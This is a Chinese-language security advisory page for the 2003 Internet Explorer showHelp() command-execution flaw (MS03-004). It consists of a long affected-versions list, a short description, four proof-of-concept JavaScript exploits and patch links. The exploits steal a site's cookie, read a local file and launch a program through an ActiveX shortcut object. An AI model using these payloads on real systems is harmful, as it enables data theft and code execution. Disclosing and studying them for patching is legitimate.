xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Microsoft Internet Explorer ShowHelp执行任意命令漏洞


发布时间:2003-02-22
更新时间:2003-02-22
严重程度:
威胁程度:普通用户访问权限
错误类型:设计错误
利用方式:客户机模式

BUGTRAQ ID:6780

受影响系统
Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1 SP2
   -Microsoft Windows 2000 Advanced Server
   -Microsoft Windows 2000 Advanced Server SP1
   -Microsoft Windows 2000 Advanced Server SP2
   -Microsoft Windows 2000 Datacenter Server
   -Microsoft Windows 2000 Datacenter Server SP1
   -Microsoft Windows 2000 Datacenter Server SP2
   -Microsoft Windows 2000 Professional
   -Microsoft Windows 2000 Professional SP1
   -Microsoft Windows 2000 Professional SP2
   -Microsoft Windows 2000 Server
   -Microsoft Windows 2000 Server SP1
   -Microsoft Windows 2000 Server SP2
   -Microsoft Windows 2000 Terminal Services
   -Microsoft Windows 2000 Terminal Services SP1
   -Microsoft Windows 2000 Terminal Services SP2
   -Microsoft Windows 95
   -Microsoft Windows 98
   -Microsoft Windows NT Enterprise Server 4.0
   -Microsoft Windows NT Enterprise Server 4.0 SP1
   -Microsoft Windows NT Enterprise Server 4.0 SP2
   -Microsoft Windows NT Enterprise Server 4.0 SP3
   -Microsoft Windows NT Enterprise Server 4.0 SP4
   -Microsoft Windows NT Enterprise Server 4.0 SP5
   -Microsoft Windows NT Enterprise Server 4.0 SP6
   -Microsoft Windows NT Enterprise Server 4.0 SP6a
   -Microsoft Windows NT Server 4.0
   -Microsoft Windows NT Server 4.0 SP1
   -Microsoft Windows NT Server 4.0 SP2
   -Microsoft Windows NT Server 4.0 SP3
   -Microsoft Windows NT Server 4.0 SP4
   -Microsoft Windows NT Server 4.0 SP5
   -Microsoft Windows NT Server 4.0 SP6
   -Microsoft Windows NT Server 4.0 SP6a
   -Microsoft Windows NT Terminal Server 4.0
   -Microsoft Windows NT Terminal Server 4.0 SP1
   -Microsoft Windows NT Terminal Server 4.0 SP2
   -Microsoft Windows NT Terminal Server 4.0 SP3
   -Microsoft Windows NT Terminal Server 4.0 SP4
   -Microsoft Windows NT Terminal Server 4.0 SP5
   -Microsoft Windows NT Terminal Server 4.0 SP6
   -Microsoft Windows NT Terminal Server 4.0 SP6a
   -Microsoft Windows NT Workstation 4.0
   -Microsoft Windows NT Workstation 4.0 SP1
   -Microsoft Windows NT Workstation 4.0 SP2
   -Microsoft Windows NT Workstation 4.0 SP3
   -Microsoft Windows NT Workstation 4.0 SP4
   -Microsoft Windows NT Workstation 4.0 SP5
   -Microsoft Windows NT Workstation 4.0 SP6
   -Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 5.0.1 SP1
   -Microsoft Windows 2000 Advanced Server
   -Microsoft Windows 2000 Advanced Server SP1
   -Microsoft Windows 2000 Advanced Server SP2
   -Microsoft Windows 2000 Datacenter Server
   -Microsoft Windows 2000 Datacenter Server SP1
   -Microsoft Windows 2000 Datacenter Server SP2
   -Microsoft Windows 2000 Professional
   -Microsoft Windows 2000 Professional SP1
   -Microsoft Windows 2000 Professional SP2
   -Microsoft Windows 2000 Server
   -Microsoft Windows 2000 Server SP1
   -Microsoft Windows 2000 Server SP2
   -Microsoft Windows 2000 Terminal Services
   -Microsoft Windows 2000 Terminal Services SP1
   -Microsoft Windows 2000 Terminal Services SP2
   -Microsoft Windows 95
   -Microsoft Windows 98
   -Microsoft Windows NT Enterprise Server 4.0
   -Microsoft Windows NT Enterprise Server 4.0 SP1
   -Microsoft Windows NT Enterprise Server 4.0 SP2
   -Microsoft Windows NT Enterprise Server 4.0 SP3
   -Microsoft Windows NT Enterprise Server 4.0 SP4
   -Microsoft Windows NT Enterprise Server 4.0 SP5
   -Microsoft Windows NT Enterprise Server 4.0 SP6
   -Microsoft Windows NT Enterprise Server 4.0 SP6a
   -Microsoft Windows NT Server 4.0
   -Microsoft Windows NT Server 4.0 SP1
   -Microsoft Windows NT Server 4.0 SP2
   -Microsoft Windows NT Server 4.0 SP3
   -Microsoft Windows NT Server 4.0 SP4
   -Microsoft Windows NT Server 4.0 SP5
   -Microsoft Windows NT Server 4.0 SP6
   -Microsoft Windows NT Server 4.0 SP6a
   -Microsoft Windows NT Terminal Server 4.0
   -Microsoft Windows NT Terminal Server 4.0 SP1
   -Microsoft Windows NT Terminal Server 4.0 SP2
   -Microsoft Windows NT Terminal Server 4.0 SP3
   -Microsoft Windows NT Terminal Server 4.0 SP4
   -Microsoft Windows NT Terminal Server 4.0 SP5
   -Microsoft Windows NT Terminal Server 4.0 SP6
   -Microsoft Windows NT Terminal Server 4.0 SP6a
   -Microsoft Windows NT Workstation 4.0
   -Microsoft Windows NT Workstation 4.0 SP1
   -Microsoft Windows NT Workstation 4.0 SP2
   -Microsoft Windows NT Workstation 4.0 SP3
   -Microsoft Windows NT Workstation 4.0 SP4
   -Microsoft Windows NT Workstation 4.0 SP5
   -Microsoft Windows NT Workstation 4.0 SP6
   -Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 5.0.1
   -Microsoft Windows 2000 Advanced Server
   -Microsoft Windows 2000 Advanced Server SP1
   -Microsoft Windows 2000 Advanced Server SP2
   -Microsoft Windows 2000 Datacenter Server
   -Microsoft Windows 2000 Datacenter Server SP1
   -Microsoft Windows 2000 Datacenter Server SP2
   -Microsoft Windows 2000 Professional
   -Microsoft Windows 2000 Professional SP1
   -Microsoft Windows 2000 Professional SP2
   -Microsoft Windows 2000 Server
   -Microsoft Windows 2000 Server SP1
   -Microsoft Windows 2000 Server SP2
   -Microsoft Windows 2000 Terminal Services
   -Microsoft Windows 2000 Terminal Services SP1
   -Microsoft Windows 2000 Terminal Services SP2
   -Microsoft Windows 95
   -Microsoft Windows 98
   -Microsoft Windows 98SE
   -Microsoft Windows NT Enterprise Server 4.0 SP3
   -Microsoft Windows NT Enterprise Server 4.0 SP4
   -Microsoft Windows NT Enterprise Server 4.0 SP5
   -Microsoft Windows NT Enterprise Server 4.0 SP6
   -Microsoft Windows NT Enterprise Server 4.0 SP6a
   -Microsoft Windows NT Server 4.0 SP3
   -Microsoft Windows NT Server 4.0 SP4
   -Microsoft Windows NT Server 4.0 SP5
   -Microsoft Windows NT Server 4.0 SP6
   -Microsoft Windows NT Server 4.0 SP6a
   -Microsoft Windows NT Terminal Server 4.0 SP3
   -Microsoft Windows NT Terminal Server 4.0 SP4
   -Microsoft Windows NT Terminal Server 4.0 SP5
   -Microsoft Windows NT Terminal Server 4.0 SP6
   -Microsoft Windows NT Terminal Server 4.0 SP6a
   -Microsoft Windows NT Workstation 4.0 SP3
   -Microsoft Windows NT Workstation 4.0 SP4
   -Microsoft Windows NT Workstation 4.0 SP5
   -Microsoft Windows NT Workstation 4.0 SP6
   -Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 5.5 SP2
   -Microsoft Windows 2000 Advanced Server
   -Microsoft Windows 2000 Advanced Server SP1
   -Microsoft Windows 2000 Advanced Server SP2
   -Microsoft Windows 2000 Datacenter Server
   -Microsoft Windows 2000 Datacenter Server SP1
   -Microsoft Windows 2000 Datacenter Server SP2
   -Microsoft Windows 2000 Professional
   -Microsoft Windows 2000 Professional SP1
   -Microsoft Windows 2000 Professional SP2
   -Microsoft Windows 2000 Server
   -Microsoft Windows 2000 Server SP1
   -Microsoft Windows 2000 Server SP2
   -Microsoft Windows 2000 Terminal Services
   -Microsoft Windows 2000 Terminal Services SP1
   -Microsoft Windows 2000 Terminal Services SP2
   -Microsoft Windows 95
   -Microsoft Windows 98
   -Microsoft Windows 98SE
   -Microsoft Windows ME
   -Microsoft Windows NT Enterprise Server 4.0
   -Microsoft Windows NT Enterprise Server 4.0 SP1
   -Microsoft Windows NT Enterprise Server 4.0 SP2
   -Microsoft Windows NT Enterprise Server 4.0 SP3
   -Microsoft Windows NT Enterprise Server 4.0 SP4
   -Microsoft Windows NT Enterprise Server 4.0 SP5
   -Microsoft Windows NT Enterprise Server 4.0 SP6
   -Microsoft Windows NT Enterprise Server 4.0 SP6a
   -Microsoft Windows NT Server 4.0
   -Microsoft Windows NT Server 4.0 SP1
   -Microsoft Windows NT Server 4.0 SP2
   -Microsoft Windows NT Server 4.0 SP3
   -Microsoft Windows NT Server 4.0 SP4
   -Microsoft Windows NT Server 4.0 SP5
   -Microsoft Windows NT Server 4.0 SP6
   -Microsoft Windows NT Server 4.0 SP6a
   -Microsoft Windows NT Terminal Server 4.0
   -Microsoft Windows NT Terminal Server 4.0 SP1
   -Microsoft Windows NT Terminal Server 4.0 SP2
   -Microsoft Windows NT Terminal Server 4.0 SP3
   -Microsoft Windows NT Terminal Server 4.0 SP4
   -Microsoft Windows NT Terminal Server 4.0 SP5
   -Microsoft Windows NT Terminal Server 4.0 SP6
   -Microsoft Windows NT Terminal Server 4.0 SP6a
   -Microsoft Windows NT Workstation 4.0
   -Microsoft Windows NT Workstation 4.0 SP1
   -Microsoft Windows NT Workstation 4.0 SP2
   -Microsoft Windows NT Workstation 4.0 SP3
   -Microsoft Windows NT Workstation 4.0 SP4
   -Microsoft Windows NT Workstation 4.0 SP5
   -Microsoft Windows NT Workstation 4.0 SP6
   -Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 5.5 SP1
   -Microsoft Windows 2000 Advanced Server
   -Microsoft Windows 2000 Advanced Server SP1
   -Microsoft Windows 2000 Advanced Server SP2
   -Microsoft Windows 2000 Datacenter Server
   -Microsoft Windows 2000 Datacenter Server SP1
   -Microsoft Windows 2000 Datacenter Server SP2
   -Microsoft Windows 2000 Professional
   -Microsoft Windows 2000 Professional SP1
   -Microsoft Windows 2000 Professional SP2
   -Microsoft Windows 2000 Server
   -Microsoft Windows 2000 Server SP1
   -Microsoft Windows 2000 Server SP2
   -Microsoft Windows 2000 Terminal Services
   -Microsoft Windows 2000 Terminal Services SP1
   -Microsoft Windows 2000 Terminal Services SP2
   -Microsoft Windows 95
   -Microsoft Windows 98
   -Microsoft Windows NT Enterprise Server 4.0
   -Microsoft Windows NT Enterprise Server 4.0 SP1
   -Microsoft Windows NT Enterprise Server 4.0 SP2
   -Microsoft Windows NT Enterprise Server 4.0 SP3
   -Microsoft Windows NT Enterprise Server 4.0 SP4
   -Microsoft Windows NT Enterprise Server 4.0 SP5
   -Microsoft Windows NT Enterprise Server 4.0 SP6
   -Microsoft Windows NT Enterprise Server 4.0 SP6a
   -Microsoft Windows NT Server 4.0
   -Microsoft Windows NT Server 4.0 SP1
   -Microsoft Windows NT Server 4.0 SP2
   -Microsoft Windows NT Server 4.0 SP3
   -Microsoft Windows NT Server 4.0 SP4
   -Microsoft Windows NT Server 4.0 SP5
   -Microsoft Windows NT Server 4.0 SP6
   -Microsoft Windows NT Server 4.0 SP6a
   -Microsoft Windows NT Terminal Server 4.0
   -Microsoft Windows NT Terminal Server 4.0 SP1
   -Microsoft Windows NT Terminal Server 4.0 SP2
   -Microsoft Windows NT Terminal Server 4.0 SP3
   -Microsoft Windows NT Terminal Server 4.0 SP4
   -Microsoft Windows NT Terminal Server 4.0 SP5
   -Microsoft Windows NT Terminal Server 4.0 SP6
   -Microsoft Windows NT Terminal Server 4.0 SP6a
   -Microsoft Windows NT Workstation 4.0
   -Microsoft Windows NT Workstation 4.0 SP1
   -Microsoft Windows NT Workstation 4.0 SP2
   -Microsoft Windows NT Workstation 4.0 SP3
   -Microsoft Windows NT Workstation 4.0 SP4
   -Microsoft Windows NT Workstation 4.0 SP5
   -Microsoft Windows NT Workstation 4.0 SP6
   -Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 5.5
   -Microsoft Windows 2000 Advanced Server
   -Microsoft Windows 2000 Advanced Server SP1
   -Microsoft Windows 2000 Advanced Server SP2
   -Microsoft Windows 2000 Datacenter Server
   -Microsoft Windows 2000 Datacenter Server SP1
   -Microsoft Windows 2000 Datacenter Server SP2
   -Microsoft Windows 2000 Professional
   -Microsoft Windows 2000 Professional SP1
   -Microsoft Windows 2000 Professional SP2
   -Microsoft Windows 2000 Server
   -Microsoft Windows 2000 Server SP1
   -Microsoft Windows 2000 Server SP2
   -Microsoft Windows 2000 Terminal Services
   -Microsoft Windows 2000 Terminal Services SP1
   -Microsoft Windows 2000 Terminal Services SP2
   -Microsoft Windows 95
   -Microsoft Windows 98
   +Microsoft Windows ME
   -Microsoft Windows NT Enterprise Server 4.0
   -Microsoft Windows NT Enterprise Server 4.0 SP1
   -Microsoft Windows NT Enterprise Server 4.0 SP2
   -Microsoft Windows NT Enterprise Server 4.0 SP3
   -Microsoft Windows NT Enterprise Server 4.0 SP4
   -Microsoft Windows NT Enterprise Server 4.0 SP5
   -Microsoft Windows NT Enterprise Server 4.0 SP6
   -Microsoft Windows NT Enterprise Server 4.0 SP6a
   -Microsoft Windows NT Server 4.0
   -Microsoft Windows NT Server 4.0 SP1
   -Microsoft Windows NT Server 4.0 SP2
   -Microsoft Windows NT Server 4.0 SP3
   -Microsoft Windows NT Server 4.0 SP4
   -Microsoft Windows NT Server 4.0 SP5
   -Microsoft Windows NT Server 4.0 SP6
   -Microsoft Windows NT Server 4.0 SP6a
   -Microsoft Windows NT Terminal Server 4.0
   -Microsoft Windows NT Terminal Server 4.0 SP1
   -Microsoft Windows NT Terminal Server 4.0 SP2
   -Microsoft Windows NT Terminal Server 4.0 SP3
   -Microsoft Windows NT Terminal Server 4.0 SP4
   -Microsoft Windows NT Terminal Server 4.0 SP5
   -Microsoft Windows NT Terminal Server 4.0 SP6
   -Microsoft Windows NT Terminal Server 4.0 SP6a
   -Microsoft Windows NT Workstation 4.0
   -Microsoft Windows NT Workstation 4.0 SP1
   -Microsoft Windows NT Workstation 4.0 SP2
   -Microsoft Windows NT Workstation 4.0 SP3
   -Microsoft Windows NT Workstation 4.0 SP4
   -Microsoft Windows NT Workstation 4.0 SP5
   -Microsoft Windows NT Workstation 4.0 SP6
   -Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
   -Microsoft Windows 2000 Advanced Server
   -Microsoft Windows 2000 Advanced Server SP1
   -Microsoft Windows 2000 Advanced Server SP2
   -Microsoft Windows 2000 Datacenter Server
   -Microsoft Windows 2000 Datacenter Server SP1
   -Microsoft Windows 2000 Datacenter Server SP2
   -Microsoft Windows 2000 Professional
   -Microsoft Windows 2000 Professional SP1
   -Microsoft Windows 2000 Professional SP2
   -Microsoft Windows 2000 Server
   -Microsoft Windows 2000 Server SP1
   -Microsoft Windows 2000 Server SP2
   -Microsoft Windows 2000 Terminal Services
   -Microsoft Windows 2000 Terminal Services SP1
   -Microsoft Windows 2000 Terminal Services SP2
   -Microsoft Windows 98
   -Microsoft Windows 98SE
   -Microsoft Windows ME
   -Microsoft Windows NT Enterprise Server 4.0 SP6a
   -Microsoft Windows NT Server 4.0 SP6a
   -Microsoft Windows NT Terminal Server 4.0 SP6a
   -Microsoft Windows NT Workstation 4.0 SP6a
详细描述
Microsoft IE实现了showHelp()用来显示HTML页面中的帮助内容。然后通过可插入的协议,此功能可以用来执行一些设计之外的动作。那些动作包括读取文件或在系统上执行任意命令。

测试代码
Exploit 1:

// Sandblad advisory #11 - Read your google cookie
showHelp("file:");showHelp("http://www.google.com/");
showHelp("javascript:alert(document.cookie)");

Exploit 2:

// Sandblad advisory #11 - Read the file c:\test.txt
showHelp("file:");showHelp("res://shdoclc.dll/about.dlg");
showHelp("javascript:try{c=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){c=new
ActiveXObject('Microsoft.XMLHTTP')};c.open('GET','file://c:/
test.txt',false);c.send(null);alert(c.responseText)");

Exploit 3:

// Sandblad advisory #11 - Read the file c:\test.txt
showHelp("file:");showHelp("file://c:/test.txt");
showHelp("javascript:alert(document.body.innerText)");

Exploit 4:

// Sandblad advisory #11 - Run the very nice game Winmine
showHelp("file:");showHelp("iexplore.chm");showHelp("res:");
showHelp("javascript:location='mk:@MSITStore:C:'");
showHelp("javascript:document.write('<object id=c classid=clsid:adb880a6-d8ff-
11cf-9377-00aa003b7a11\\u003E<param name=Command value=ShortCut\\u003E\<param
name=Item1 value=,winmine,\\u003E</object\\u003E');c.Click();");

解决方案
厂商已经发布了补丁:

Microsoft Internet Explorer 5.0.1 SP3:
     Microsoft Patch Q810847
     http://www.microsoft.com/windows/ie/downloads/critical/810847/default.asp
Microsoft Internet Explorer 5.0.1 SP2:
Microsoft Internet Explorer 5.0.1 SP1:
Microsoft Internet Explorer 5.0.1:
Microsoft Internet Explorer 5.5 SP2:
     Microsoft Patch Q810847
     http://www.microsoft.com/windows/ie/downloads/critical/810847/default.asp
Microsoft Internet Explorer 5.5 SP1:
Microsoft Internet Explorer 5.5:
Microsoft Internet Explorer 6.0 SP1:
     Microsoft Patch Q810847
     http://www.microsoft.com/windows/ie/downloads/critical/810847/default.asp
     Microsoft Hotfix Q813951
     http://www.microsoft.com/windows/ie/downloads/critical/813951/default.asp

相关信息
Microsoft Security Bulletin MS03-004
http://www.microsoft.com/technet/security/bulletin/MS03-004.asp
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved